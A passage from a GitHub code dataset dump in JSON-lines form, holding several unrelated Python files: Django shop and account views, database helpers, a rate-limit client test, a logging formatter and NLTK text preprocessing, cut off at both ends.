pile:\r\n            task = dict()\r\n            for i in range(len(pile_task)):\r\n                task[columns[i]] = pile_task[i]\r\n            tasks.append(task)\r\n        return tasks\r\n\r\n\r\n\"\"\"\r\nSQL_server = \"LENOVO-G700\\SQLEXPRESS\"\r\ndata_baze = \"a\"\r\nconnection = pypyodbc.connect(\r\n    'Driver={SQL Server};'\r\n    'Server=' + SQL_server + ';'\r\n    'Database=' + data_baze + ';'\r\n)\r\ncursor = connection.cursor()\r\n\r\ncursor.execute(SQL_query)\r\nconnection.commit()\r\nconnection.close()\r\n\"\"\"\r\n","repo_name":"GlebAkunenko/VK-bot","sub_path":"SQL_server.py","file_name":"SQL_server.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"25263185327","text":"import logging\n\nfrom django.shortcuts import get_object_or_404, Http404\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Sum\n\nfrom cartapp.models import Cart\nfrom productapp.models import Product\n\nlogger = logging.getLogger('django_logger')\n\n\ndef get_cart_products_by_user(request):\n    \"\"\" Returns the list of products in the user's cart\"\"\"\n\n    return Cart.objects.filter(user=request.user).select_related('product')\n\n\ndef add_selected_product_in_cart(request, pk: int) -> None:\n    \"\"\"Adds the selected product to the cart\"\"\"\n    try:\n        selected_product = get_object_or_404(Product, pk=pk)\n        cart_item = Cart.objects.filter(user=request.user, product=selected_product).first()\n\n        if not cart_item:\n            cart_item = Cart(user=request.user, product=selected_product)\n\n        cart_item.quantity += 1\n        cart_item.save()\n    except (TypeError, ValueError, Http404) as e:\n        logger.error(e)\n\n\ndef remove_selected_product_from_cart(pk: int) -> None:\n    \"\"\"Removes the selected product from the cart\"\"\"\n\n    try:\n        selected_product = get_object_or_404(Cart, pk=pk)\n        selected_product.delete()\n    except (ObjectDoesNotExist, Http404) as e:\n        logger.error(e)\n\n\ndef change_product_quantity(request, pk: int, quantity: int) -> Cart:\n    \"\"\"Changes the quantity of the selected product in the cart\"\"\"\n    try:\n        product_quantity = int(quantity)\n        cart_item = Cart.objects.get(product_id=pk)\n\n        if product_quantity > 0:\n            cart_item.quantity = quantity\n            cart_item.save()\n        else:\n            cart_item.delete()\n\n        return 
Cart.objects.filter(user=request.user).order_by('product__price')\n except (TypeError, ValueError, Http404, ObjectDoesNotExist) as e:\n logger.error(e)\n","repo_name":"Korwys/django-online-store","sub_path":"mainapp/cartapp/services/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22030518266","text":"from gubernator import ratelimit_pb2 as pb\n\nimport pytest\nimport subprocess\nimport os\nimport gubernator\n\n\n@pytest.fixture(scope='module')\ndef cluster():\n args = [\"/bin/sh\", \"-c\",\n \"go run ./cmd/gubernator-cluster/main.go\"]\n\n os.chdir(\"golang\")\n proc = subprocess.Popen(args, stdout=subprocess.PIPE)\n os.chdir(\"..\")\n\n while True:\n line = proc.stdout.readline()\n if b'Ready' in line:\n break\n yield proc\n proc.kill()\n\n\ndef test_health_check(cluster):\n client = gubernator.V1Client()\n resp = client.health_check()\n print(\"Health:\", resp)\n\n\ndef test_get_rate_limit(cluster):\n req = pb.Requests()\n rate_limit = req.requests.add()\n\n rate_limit.algorithm = pb.TOKEN_BUCKET\n rate_limit.duration = gubernator.SECOND * 2\n rate_limit.limit = 10\n rate_limit.namespace = 'test-ns'\n rate_limit.unique_key = 'domain-id-0001'\n rate_limit.hits = 1\n\n client = gubernator.V1Client()\n resp = client.GetRateLimits(req, timeout=0.5)\n print(\"RateLimit: {}\".format(resp))\n","repo_name":"mailgun/gubernator","sub_path":"python/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":943,"dataset":"github-code","pt":"72"} +{"seq_id":"23452804658","text":"\r\nfrom domino.core import log\r\nfrom discount.core import Finder\r\n\r\ndef group_table(page, cur, finder):\r\n table = page.table('product_groups', hole_update=True)\r\n table.column('Код')\r\n table.column('UID')\r\n table.column('Описание')\r\n cur.execute('''\r\n select \r\n rawtohex(C.id), \r\n C.name, \r\n G.name,\r\n C.code,\r\n DOMINO.DominoUIDToString(C.id)\r\n from \r\n db1_classif C, db1_classif G\r\n where \r\n C.name is not NULL and C.type=14745602 and C.pid = G.id\r\n order by G.name\r\n ''')\r\n for id, name, gname, code, uid in cur:\r\n if not finder.match(code, uid, name, gname):\r\n continue\r\n row = table.row(id)\r\n row.text(code)\r\n row.text(uid)\r\n row.text(f'{gname} :: {name}')\r\n\r\ndef find(page):\r\n page.application['navbar'](page)\r\n account_id = page.request.account_id()\r\n conn = page.application.account_database_connect(account_id)\r\n cur = conn.cursor()\r\n finder = Finder(page)\r\n group_table(page, cur, finder)\r\n conn.close()\r\n\r\ndef open(page):\r\n page.application['navbar'](page)\r\n account_id = page.request.account_id()\r\n finder = Finder(page)\r\n page.title('Товарные группы')\r\n toolbar = page.table('toolbar', css='table-borderless').row()\r\n finder.append(toolbar)\r\n \r\n #finder.input(name='toolbar')\r\n #finder.button().glif('search').on_click('.find', forms=[finder]).secondary()\r\n \r\n conn = page.application.account_database_connect(account_id)\r\n cur = conn.cursor()\r\n group_table(page, cur, finder)\r\n conn.close()\r\n","repo_name":"polikashechkin/discount","sub_path":"python/pages/product_groups.py","file_name":"product_groups.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33163088465","text":"import psycopg2\r\nimport 
config\r\nimport requests\r\n\r\n\r\ndef connect():\r\n    db = psycopg2.connect(dbname=config.dbname, host=config.host,\r\n                          port=config.port, user=config.user, password=config.passwd)\r\n    return db\r\n\r\n\r\n\r\ndef selectAllUsers():\r\n    db = connect()\r\n    cur = db.cursor()\r\n    try:\r\n        cur.execute('SELECT * from public.\"user\";')\r\n    except:\r\n        print(\"I can't SELECT from user\")\r\n\r\n    rows = cur.fetchall()\r\n    return(rows)\r\n\r\ndef selectActivity(chat_id):\r\n    db = connect()\r\n    cur = db.cursor()\r\n    rows = []\r\n    try:\r\n        cur.execute(\"\"\"\r\n            SELECT * FROM public.user_activity\r\n            WHERE user_id = %s;\r\n            \"\"\",\r\n            (str(chat_id),))\r\n        rows = cur.fetchall()\r\n    except:\r\n        print(\"I can't SELECT from user_activity\")\r\n\r\n    return (rows)\r\n\r\n\r\ndef addUser(chat_id):\r\n    db = connect()\r\n    cur = db.cursor()\r\n    try:\r\n        cur.execute(\"\"\"\r\n            INSERT INTO public.user(id) \r\n            VALUES (%s);\r\n            \"\"\",\r\n            (chat_id,))\r\n        print('DONE')\r\n        db.commit()\r\n    except:\r\n        print(\"I can't INSERT into user\")\r\n\r\n\r\ndef addCityToUser(user_id, city_id):\r\n    db = connect()\r\n    cur = db.cursor()\r\n    try:\r\n        cur.execute(\"\"\"\r\n            INSERT INTO public.user_city(user_id, city_id) \r\n            VALUES (%s, %s);\r\n            \"\"\",\r\n            (user_id, city_id))\r\n        print('DONE')\r\n        db.commit()\r\n    except:\r\n        print(\"I can't INSERT into user_city\")\r\n\r\n\r\ndef addEvent(dic):\r\n    url = \"https://kudago.com/public-api/v1.2/event-categories/?lang=ru\"\r\n    headers = {'Content-Type': 'application/json'}\r\n    r = requests.get(url, '', headers=headers)\r\n    dic = r.json()\r\n\r\n    db = connect()\r\n    cur = db.cursor()\r\n    for d in dic:\r\n        try:\r\n            cur.execute(\"\"\"\r\n                INSERT INTO public.event(event_id, event_name) \r\n                VALUES (%s, %s);\r\n                \"\"\",\r\n                (d['slug'], d['name']))\r\n            print('DONE')\r\n            db.commit()\r\n        except:\r\n            print(\"I can't INSERT into event\")\r\n\r\n\r\ndef addCountPercent(chat_id, count, usersEvents):\r\n    db = connect()\r\n    print('I\\'m here')\r\n    cur = db.cursor()\r\n\r\n    for d in usersEvents:\r\n        print(chat_id, d, int((usersEvents[d] / count) * 5))\r\n        try:\r\n            cur.execute(\"\"\"\r\n                INSERT INTO public.user_event(user_id, event_id, count) \r\n                VALUES (%s, %s, %s);\r\n                \"\"\",\r\n                (str(chat_id), d, int((usersEvents[d] / count) * 5)))\r\n            print('DONE')\r\n            db.commit()\r\n        except:\r\n            db.rollback()\r\n            print(\"I can't INSERT into user_event\")\r\n            print(\"I try UPDATE user_event\")\r\n            cur.execute(\"\"\"\r\n                UPDATE public.user_event\r\n                SET count = %s\r\n                WHERE user_id = %s AND event_id = %s;\r\n                \"\"\",\r\n                (int((usersEvents[d] / count) * 5), str(chat_id), d))\r\n            print('DONE')\r\n            db.commit()\r\n\r\n\r\ndef addActivity(chat_id, UA):\r\n    db = connect()\r\n\r\n    cur = db.cursor()\r\n\r\n    print('AAAAAAAAAAAAAAAAAAAAAAA', UA)\r\n\r\n    usersActivity = { i: {'id' : UA[i]['id'], 'mark' : UA[i]['mark']} for i in UA if UA[i]['mark'] != 0}\r\n\r\n    for d in usersActivity:\r\n        print(chat_id, usersActivity[d]['id'], usersActivity[d]['mark'])\r\n        try:\r\n            cur.execute(\"\"\"\r\n                INSERT INTO public.user_activity(user_id, act_id, mark) \r\n                VALUES (%s, %s, %s);\r\n                \"\"\",\r\n                (str(chat_id), usersActivity[d]['id'], usersActivity[d]['mark']))\r\n            print('DONE')\r\n            db.commit()\r\n        except:\r\n            db.rollback()\r\n            print(\"I can't INSERT into user_activity\")\r\n            if(usersActivity[d]['mark'] != 0):\r\n                print(\"I try UPDATE user_activity\")\r\n                cur.execute(\"\"\"\r\n                    UPDATE public.user_activity\r\n                    SET mark = %s\r\n                    WHERE user_id = %s AND act_id = %s;\r\n                    \"\"\",\r\n                    (usersActivity[d]['mark'], str(chat_id), 
str(usersActivity[d]['id'])))\r\n                print('DONE')\r\n                db.commit()\r\n\r\ndef getEventMarkInfo(chat_id):\r\n    db = connect()\r\n    cur = db.cursor()\r\n    rows = []\r\n    try:\r\n        cur.execute(\"\"\"\r\n            SELECT * FROM public.user_event \r\n            WHERE user_id = %s AND count!=0;\r\n            \"\"\",\r\n            (str(chat_id),))\r\n        rows = cur.fetchall()\r\n    except:\r\n        print(\"I can't SELECT from user_event\")\r\n\r\n    return(rows)\r\n\r\n\r\ndef getRecomendation(chat_id, simList):\r\n    db = connect()\r\n    cur = db.cursor()\r\n    rows = []\r\n    try:\r\n        cur.execute(\"\"\"\r\n            SELECT n1.act_id, avg(n1.mark)\r\n            FROM (SELECT act_id, mark\r\n                  FROM public.user_activity\r\n                  WHERE user_id != %s AND user_id = ANY(%s)) n1\r\n            GROUP BY n1.act_id\r\n            HAVING avg(n1.mark) >= 2.5\r\n            ORDER BY 2 DESC;\r\n            \"\"\",\r\n            (str(chat_id), simList))\r\n        rows = cur.fetchall()\r\n    except:\r\n        print(\"I can't SELECT from user_activity\")\r\n    return(rows)","repo_name":"Veronika-Kuzyaeva/CIT-course-bot","sub_path":"db_src/db_reg.py","file_name":"db_reg.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"73144480873","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom math import ceil\nimport re\nfrom smtplib import SMTPException\n\nfrom boards.models import Board, Reply\nfrom boards.table import BoardTable\nfrom core.utils import error_page\n\nfrom django.conf import settings\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail\nfrom django.core.signing import TimestampSigner\nfrom django.db.models import Q\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext as _\n\nfrom teams.table import TeamTable\n\nfrom .forms import RegistrationForm, SettingForm, UserInfoForm\nfrom .models import Profile, UserSession\n\n\n@login_required\ndef setting(request):\n    \"\"\"Account setting\"\"\"\n    if request.method == \"POST\":\n        settingform = SettingForm(request.POST)\n        if settingform.is_valid():\n            setting = settingform.save(commit=False)\n            request.user.profile.sense_client = setting.sense_client\n            request.user.profile.sense_slot = setting.sense_slot\n            request.user.profile.alarm_board = setting.alarm_board\n            request.user.profile.alarm_reply = True\n            request.user.profile.alarm_paper = setting.alarm_paper\n            request.user.profile.alarm_team = setting.alarm_team\n            request.user.profile.alarm_full = True\n            if setting.alarm_interval < settings.MIN_ALARM_INTERVAL:\n                request.user.profile.alarm_interval \\\n                    = settings.MIN_ALARM_INTERVAL\n            elif setting.alarm_interval > settings.MAX_ALARM_INTERVAL:\n                request.user.profile.alarm_interval \\\n                    = settings.MAX_ALARM_INTERVAL\n            else:\n                request.user.profile.alarm_interval = setting.alarm_interval\n            request.user.profile.save()\n            msg = _('Saved successfully.')\n        else:\n            msg = _('Form validation Failure')\n\n    elif request.method == \"GET\":\n        if request.user.is_authenticated:\n            msg = \"\"\n            settingform = SettingForm(instance=request.user.profile)\n        else:\n            return redirect('/')\n\n    return render(\n        request,\n        \"accounts/setting.html\",\n        {\n            'settingform': settingform,\n            'msg': msg,\n        }\n    )\n\n\n@login_required\ndef edit_user_info(request):\n    \"\"\"Edit user information\"\"\"\n    profile = 
get_object_or_404(Profile, pk=request.user.profile.id)\n if request.method == \"POST\":\n infoform = UserInfoForm(request.POST, request.FILES, instance=profile)\n if infoform.is_valid():\n error = False\n if settings.ENABLE_NICKNAME:\n nick = infoform.cleaned_data['first_name']\n if nick != request.user.first_name:\n if nick == '':\n request.user.first_name = ''\n else:\n q = Q(username__iexact=nick) \\\n | Q(first_name__iexact=nick)\n if User.objects.filter(q).exists() or \\\n len(nick) < settings.NICKNAME_MIN_LENGTH or \\\n len(nick) > settings.NICKNAME_MAX_LENGTH:\n msg = _('Please check nickname.')\n error = True\n else:\n request.user.first_name = nick\n\n email = infoform.cleaned_data['email']\n if not error and email != request.user.email:\n code = infoform.cleaned_data['code']\n signer = TimestampSigner()\n try:\n value = signer.unsign(\n code, max_age=settings.VERIFICATION_CODE_VALID)\n code_check = value == email\n\n if code_check:\n request.user.email = email\n else:\n msg = _('Verification failure. Please check verification code again.')\n error = True\n except:\n msg = _('Verification failure. Please check verification code again.')\n error = True\n\n if not error:\n msg = _('Saved successfully.')\n request.user.save()\n infoform.save()\n else:\n msg = _('Form validation Failure')\n elif request.method == \"GET\":\n if request.user.is_authenticated:\n msg = \"\"\n infoform = UserInfoForm(instance=profile)\n else:\n return redirect('/')\n\n return render(\n request,\n \"accounts/edit_user_info.html\",\n {\n 'infoform': infoform,\n 'username': request.user.username,\n 'date_joined': request.user.date_joined,\n 'point': profile.point,\n 'portrait': profile.portrait,\n 'msg': msg,\n }\n )\n\n\n@login_required\ndef user_info(request, user):\n \"\"\"Show user info\"\"\"\n userinfo = User.objects.filter(username__iexact=user).get()\n article_no = Board.objects.filter(user__username__iexact=user).count()\n reply_no = Reply.objects.filter(user__username__iexact=user).count()\n\n return render(\n request,\n \"accounts/user_info.html\",\n {\n 'userinfo': userinfo,\n 'article_no': article_no,\n 'reply_no': reply_no,\n }\n )\n\n\n@login_required\ndef scrap_list(request, page=0):\n \"\"\"Show scrap list\"\"\"\n if int(page) < 1:\n return redirect('accounts:scrap_list', page=1)\n\n board_table = BoardTable()\n my_scrap = []\n name_list = board_table.get_table_list()\n list_count = board_table.get_list_count()\n\n current_page = int(page) - 1\n start_at = current_page * list_count\n end_at = start_at + list_count\n\n q = Q(status__iexact='1normal') | Q(status__iexact='4warning') \\\n | Q(status__iexact='3notice')\n\n scrap = request.user.profile.scrap.split(',')\n total = len(scrap)\n\n if request.user.profile.scrap != '':\n for index, s in enumerate(scrap[start_at:end_at]):\n app, id = s.split(':')\n if app == 'boards':\n item = Board.objects.filter(id__iexact=id).filter(q)\n if item.count():\n my_scrap.append([item[0]])\n else:\n continue\n\n index_total = int(ceil(float(total) / list_count))\n index_begin = int(current_page / 10) * 10 + 1\n index_end = mindex_end = index_total\n if index_end - index_begin >= 10:\n index_end = index_begin + 9\n mindex_begin = int(current_page / 5) * 5 + 1\n if mindex_end - mindex_begin >= 5:\n mindex_end = mindex_begin + 4\n\n return render(\n request,\n \"accounts/scrap.html\",\n {\n 'my_scrap': my_scrap,\n 'total': total,\n 'page': current_page + 1,\n 'index_begin': index_begin,\n 'index_end': index_end + 1,\n 'mindex_begin': mindex_begin,\n 'mindex_end': 
mindex_end + 1,\n 'index_total': index_total,\n 'name_list': name_list,\n }\n )\n\n\n@login_required\ndef delete_scrap(request, id):\n \"\"\"Delete selected scrap\"\"\"\n profile = request.user.profile\n app_id = 'boards:' + id\n regstr = re.escape(app_id) + r\"\\b(,|)\"\n profile.scrap = re.sub(regstr, '', profile.scrap)\n if profile.scrap and profile.scrap[-1] == ',':\n profile.scrap = profile.scrap[:-1]\n\n request.user.profile.save()\n return redirect('accounts:scrap_list_0')\n\n\n@login_required\ndef edit_bookmarks(request):\n \"\"\"Edit bookmarks\"\"\"\n my_bookmark = []\n if request.user.profile.bookmarks:\n bookmarks = request.user.profile.bookmarks.split(',')\n\n for bm in bookmarks:\n app, id = bm.split('-')\n if app == 'boards':\n app_table = BoardTable()\n elif app == 'teams':\n app_table = TeamTable()\n else:\n continue\n my_bookmark.append(\n [bm, app_table.get_table_name(id)]\n )\n\n return render(\n request,\n \"accounts/edit_bookmarks.html\",\n {\n 'my_bookmark': my_bookmark,\n }\n )\n\n\ndef sign_up(request):\n \"\"\"Sign up\"\"\"\n if request.method == \"POST\":\n userform = RegistrationForm(request.POST)\n if userform.is_valid():\n userform.save(commit=False)\n\n username = userform.cleaned_data['username']\n q = Q(username__iexact=username) | Q(first_name__iexact=username)\n if User.objects.filter(q).exists() or \\\n len(username) < settings.ID_MIN_LENGTH or \\\n len(username) > settings.ID_MAX_LENGTH:\n errormsg = _('Please check username.')\n return error_page(request, errormsg)\n\n if settings.ENABLE_NICKNAME:\n nick = userform.cleaned_data['first_name']\n if nick:\n q = Q(username__iexact=nick) | Q(first_name__iexact=nick)\n if User.objects.filter(q).exists() or \\\n len(nick) < settings.NICKNAME_MIN_LENGTH or \\\n len(nick) > settings.NICKNAME_MAX_LENGTH:\n errormsg = _('Please check nickname.')\n return error_page(request, errormsg)\n\n code = userform.cleaned_data['code']\n email = userform.cleaned_data['email']\n signer = TimestampSigner()\n\n try:\n value = signer.unsign(\n code, max_age=settings.VERIFICATION_CODE_VALID)\n code_check = value == email\n\n if code_check:\n userform.save()\n return render(\n request,\n \"accounts/join.html\",\n )\n else:\n errormsg = _('Verification failure. Please check verification code again.')\n except:\n errormsg = _('Verification failure. Please check verification code again.')\n else:\n errormsg = _('Sorry. 
Please try again later.')\n\n return error_page(request, errormsg)\n elif request.method == \"GET\":\n userform = RegistrationForm()\n\n return render(\n request,\n \"accounts/signup.html\",\n {\n 'userform': userform,\n }\n )\n\n\n@login_required\ndef show_deactivate_account(request):\n \"\"\"Show deactivate account page\"\"\"\n return render(\n request,\n \"accounts/deactivate_account.html\"\n )\n\n\n@login_required\ndef deactivate_account(request):\n \"\"\"Deactivate account\"\"\"\n if request.user.is_authenticated:\n request.user.is_active = False\n if request.user.is_staff:\n request.user.is_staff = False\n request.user.save()\n\n return redirect(reverse_lazy('accounts:logout'))\n\n\n@user_passes_test(lambda u: u.is_superuser)\ndef send_email(request):\n \"\"\"Send email to user for testing purpose\"\"\"\n id_email = request.user.email\n signer = TimestampSigner()\n value = signer.sign(id_email)\n subject = u'Test email.'\n body = u'keyCode: %s' % value\n\n try:\n send_mail(subject, body, settings.EMAIL_HOST_USER, [id_email], fail_silently=False)\n return error_page(request, \"Email sent\", status=201)\n except SMTPException:\n return error_page(request, \"Error!\")\n\n\n@staff_member_required\ndef dashboard_user(request, search_word='', condition='recent', page=1):\n \"\"\"Dashboard user\"\"\"\n list_count = settings.DASHBOARD_LIST_COUNT\n\n if int(page) < 1:\n return redirect('accounts:dashboard_user', condition, 1)\n\n if condition == 'recent':\n order = '-id'\n elif condition == 'point':\n order = '-profile__point'\n elif condition == 'login':\n order = '-last_login'\n elif condition == 'suspension':\n order = '-profile__suspension_till'\n elif condition != 'default':\n return error_page(request)\n\n current_page = int(page) - 1\n start_at = current_page * list_count\n end_at = start_at + list_count\n\n if search_word == '':\n q = Q()\n else:\n q = (Q(username__icontains=search_word) | Q(first_name__icontains=search_word)) | Q(email__icontains=search_word) | Q(profile__ip_list__icontains=search_word)\n\n total = User.objects.filter(q).count()\n if condition == 'default':\n users = User.objects.filter(q).order_by(\n '-is_superuser', '-is_staff', '-is_active', 'username')[\n start_at:end_at]\n elif condition == 'suspension':\n users = User.objects.filter(q).filter(is_active=False).order_by(\n order)[start_at:end_at]\n else:\n users = User.objects.filter(q).order_by(order)[start_at:end_at]\n\n index_total = int(ceil(float(total) / list_count))\n index_begin = int(current_page / 10) * 10 + 1\n index_end = mindex_end = index_total\n if index_end - index_begin >= 10:\n index_end = index_begin + 9\n mindex_begin = int(current_page / 5) * 5 + 1\n if mindex_end - mindex_begin >= 5:\n mindex_end = mindex_begin + 4\n\n return render(\n request,\n \"accounts/dashboard_user.html\",\n {\n 'users': users,\n 'total': total,\n 'page': current_page + 1,\n 'index_begin': index_begin,\n 'index_end': index_end + 1,\n 'mindex_begin': mindex_begin,\n 'mindex_end': mindex_end + 1,\n 'index_total': index_total,\n 'search_word': search_word,\n 'condition': condition,\n }\n )\n\n\n@staff_member_required\ndef suspension(request, user, days):\n \"\"\"Suspend user account for days\"\"\"\n sus_days = int(days)\n userinfo = User.objects.filter(username__iexact=user).get()\n\n if sus_days == 0 and not userinfo.is_active:\n userinfo.profile.suspension_till = timezone.now()\n userinfo.is_active = True\n userinfo.save()\n elif sus_days > 0:\n sus_until = timezone.now() + timezone.timedelta(days=sus_days)\n 
userinfo.profile.suspension_till = sus_until\n userinfo.is_active = False\n userinfo.save()\n\n sessions = UserSession.objects.filter(user=userinfo)\n for session in sessions:\n session.session.delete()\n\n return redirect('accounts:user_info', user)\n","repo_name":"genonfire/bbgo","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14645,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"7615214273","text":"import logging\n\nfrom .utils import string_color, read_1970_time\nfrom django.db import connection\nfrom django.conf import settings\n\nclass JsonPrettyFormatter:\n NO_PRINT = ['name', 'msg', 'args', 'levelname', 'levelno', 'pathname',\n 'filename', 'module', 'exc_info', 'exc_text', 'stack_info',\n 'lineno', 'funcName', 'created', 'msecs', 'relativeCreated',\n 'thread', 'threadName', 'processName', 'process']\n\n def format_default(self, record: logging.LogRecord) -> str:\n header = (f'【{record.levelname}】{read_1970_time(record.msecs)}\\n'\n f'rid: {record.__dict__[\"request_id\"]}\\n')\n for i in record.__dict__:\n if i not in self.NO_PRINT:\n header += f'{i}: {string_color(record.__dict__[i], \"white\")}\\n'\n return header\n\n def format_info(self, record: logging.LogRecord) -> str:\n record.__dict__['container_id'] = getattr(settings, 'CONTAINER_ID', '')\n if record.__dict__.get('category') == 'error':\n return (f'【错误】{read_1970_time(record.created)}\\n'\n f'rid: {record.__dict__[\"request_id\"]}\\n'\n f'uri: {record.__dict__[\"path\"]}\\n'\n f'{record.__dict__[\"method\"]}: {string_color(record.msg, \"cyan\")}\\n'\n f'-----EXCEPT BEGIN-----\\n'\n f'{string_color(record.__dict__[\"except\"], \"red\")}'\n f'-----EXCEPT END-----\\n')\n if record.__dict__.get('category') == 'response':\n if settings.DEBUG:\n record.__dict__['queries'] = len(connection.queries)\n return (f'【返回请求】{read_1970_time(record.created)}\\n'\n f'rid: {record.__dict__[\"request_id\"]} cost_timez: {record.__dict__[\"cost_timez\"]} queries: {record.__dict__.get(\"queries\")} \\n'\n f'uri: {record.__dict__[\"path\"]} client_ip: {record.__dict__.get(\"client_ip\")}\\n'\n f'{record.__dict__[\"method\"]}: {string_color(record.msg, \"cyan\")}\\n'\n f'response: {string_color(record.__dict__[\"response\"], \"green\")}\\n')\n if record.__dict__.get('category') == 'request':\n return (f'【发起请求】{read_1970_time(record.created)}\\n'\n f'rid: {record.__dict__[\"request_id\"]}\\n'\n f'uri: {record.__dict__[\"path\"]}\\n'\n f'{record.__dict__[\"method\"]}: {string_color(record.msg, \"cyan\")}\\n'\n f'response: {string_color(record.__dict__[\"response\"], \"blue\")}')\n return self.format_default(record)\n\n def format(self, record: logging.LogRecord) -> str:\n if record.levelname == 'INFO':\n return self.format_info(record)\n return self.format_default(record)\n","repo_name":"xzregg/djmyframework","sub_path":"djmyframework/framework/logformatter.py","file_name":"logformatter.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12654060589","text":"import string\nimport nltk\nfrom docx import Document\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import pos_tag\nimport os \nimport win32com.client\n\n# Download necessary datasets from 
NLTK\nnltk.download(\"averaged_perceptron_tagger\")\nnltk.download(\"punkt\")\nnltk.download(\"wordnet\")\nnltk.download(\"stopwords\")\n\n\n# Function to normalize and preprocess text\ndef normalize_text(text):\n # Tokenize the input text into individual words\n tokens = word_tokenize(text)\n\n # Convert all tokens to lowercase\n tokens = [w.lower() for w in tokens]\n\n # Create a translation table to remove punctuation\n table = str.maketrans(\"\", \"\", string.punctuation)\n\n # Remove punctuation from each token using the translation table\n stripped = [w.translate(table) for w in tokens]\n\n # Filter out tokens that are not alphabetic\n words = [word for word in stripped if word.isalpha()]\n\n # Define a set of English stopwords\n stop_words = set(stopwords.words(\"english\"))\n\n # Remove stopwords from the list of tokens\n words = [w for w in words if not w in stop_words]\n\n # Initialize an empty list to store lemmatized words\n lemmatized = []\n\n # Initialize the WordNet lemmatizer\n lemmatizer = WordNetLemmatizer()\n\n # Iterate over each word and its part-of-speech tag\n for word, tag in pos_tag(words):\n # Check the part-of-speech tag and lemmatize accordingly\n if tag.startswith(\"V\"): # Verb\n word = lemmatizer.lemmatize(word, \"v\")\n elif tag.startswith(\"J\"): # Adjective\n word = lemmatizer.lemmatize(word, \"a\")\n elif tag.startswith(\"N\"): # Noun\n word = lemmatizer.lemmatize(word, \"n\")\n elif tag.startswith(\"R\"): # Adverb\n word = lemmatizer.lemmatize(word, \"r\")\n\n # Append the lemmatized word to the list\n lemmatized.append(word)\n\n # Return the list of lemmatized words\n return lemmatized\n\n# Function to preprocess a document\ndef preprocess_document(file_path):\n # Extract the file extension using the os module\n file_extension = os.path.splitext(file_path)[1].lower()\n\n if file_extension == \".txt\":\n with open(file_path, \"r\") as file:\n content = file.read()\n elif file_extension == \".docx\":\n doc = Document(file_path)\n content = \" \".join([paragraph.text for paragraph in doc.paragraphs])\n elif file_extension == \".doc\":\n # Use win32com.client to extract text from .doc files\n word = win32com.client.Dispatch(\"Word.Application\")\n doc = word.Documents.Open(file_path)\n content = doc.Content.Text\n doc.Close()\n word.Quit()\n else:\n print(\"Unsupported file format\")\n return None\n\n # Preprocess the content using the normalize_text function\n preprocessed_text = normalize_text(content)\n return preprocessed_text\n","repo_name":"nourtheguy/IDPA-P1","sub_path":"python/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3235687144","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\nfrom core import apiview_util\r\nfrom core import paginator\r\nfrom core.jsonresponse import JsonResponse, create_response\r\n\r\nfrom account.models import *\r\nfrom mall.models import *\r\nfrom modules.member.models import Member,MemberHasSocialAccount\r\nfrom mall import module_api as mall_api\r\nfrom tools.regional import views as regional_util\r\nfrom tools.express.util import *\r\nfrom market_tools.tools.weizoom_card.models import AccountHasWeizoomCardPermissions\r\nfrom webapp.modules.mall.templatetags.mall_filter import *\r\nfrom tools.express import util\r\n\r\norder_status2text = {\r\n\tORDER_STATUS_NOT: u'待支付',\r\n\tORDER_STATUS_CANCEL: 
u'已取消',\r\n\tORDER_STATUS_PAYED_SUCCESSED: u'已支付',\r\n\tORDER_STATUS_PAYED_NOT_SHIP: u'待发货',\r\n\tORDER_STATUS_PAYED_SHIPED: u'已发货',\r\n\tORDER_STATUS_SUCCESSED: u'已完成'\r\n}\r\nDEFAULT_CREATE_TIME = '2000-01-01 00:00:00'\r\ndef get_order_status_text(status):\r\n\treturn order_status2text[status]\r\n\r\n\r\ndef __data_format(datetime):\r\n\tif type(datetime) == unicode:\r\n\t\tdatetime = __parse_datetime_raw_string(datetime)\r\n\t# return str(datetime.strftime('%Y-%m-%d %H:%M:%S'))\r\n\tyear = datetime.strftime('%Y')\r\n\tmonth = datetime.strftime('%m')\r\n\tday = datetime.strftime('%d')\r\n\tmonth_day = '%s-%s-%s' % (year, month, day)\r\n\thour_minute = datetime.strftime('%H:%M:%S')\r\n\treturn '%s %s' % (month_day, hour_minute)\r\n\r\ndef _get_order_items(user, query, filter_value, sort_attr, query_string, count_per_page=15, cur_page=1):\r\n\twebapp_id = user.get_profile().webapp_id\r\n\torders = Order.objects.belong_to(webapp_id)\r\n\t# # Count the total number of orders\r\n\t# order_total_count = _get_orders_total_count(orders)\r\n\t###################################################\r\n\t# Handle search\r\n\tif query:\r\n\t\torders = orders.filter(order_id__icontains=query)\r\n\t###################################################\r\n\t# Handle filter conditions\r\n\tsource = None\r\n\tif filter_value and (filter_value != '-1'):\r\n\t\tparams, source_value = UserHasOrderFilter.get_filter_params_by_value(filter_value)\r\n\t\torders = 